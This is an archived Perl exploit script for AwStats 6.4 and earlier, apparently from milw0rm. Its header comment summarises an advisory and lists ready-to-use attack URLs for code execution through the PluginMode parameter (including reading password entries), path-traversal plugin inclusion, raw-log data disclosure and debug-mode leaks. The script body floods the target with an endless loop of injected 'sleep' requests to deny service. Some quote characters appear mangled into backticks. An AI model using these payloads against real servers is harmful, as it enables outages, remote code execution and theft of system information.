AwStats <= 6.4 Denial Of Service (with Advisory)#!/usr/bin/perl
# 
# 
# Summarized the advisory www.ghc.ru GHC: /str0ke
#											
# [0] Exploitable example (raw log plugin):						
#    Attacker can read sensitive information						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&amp;loadplugin=rawlog	
#											
# [1] Perl code execution. (This script)						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?&amp;PluginMode=:print+getpwent		
#											
# [2] Arbitrary plugin including.							
# 											
# http://server/cgi-bin/awstats-6.4/awstats.pl?&amp;loadplugin=../../../../usr/libdata/perl/5.00503/blib
#											
# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).	
#    Every user can access debug function:						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1					
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2                                  
#											
# Be sure to change the $server + /cgi-bin location /str0ke				
#											

use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => `tcp`, PeerAddr => `$server`, PeerPort => `80`)
|| die `Error\n`;
print $socket `GET /cgi-bin/awstats-6.4/awstats.pl?&amp;hack=$rp&amp;PluginMode=:sleep HTTP/1.1\n`;
print $socket `Host: $server\n`;
print $socket `Accept: */*\n`;
print $socket `\n\n`;
}

while () {
$rp = rand;
&amp;ConnectServer;
}

# milw0rm.com [2005-02-14]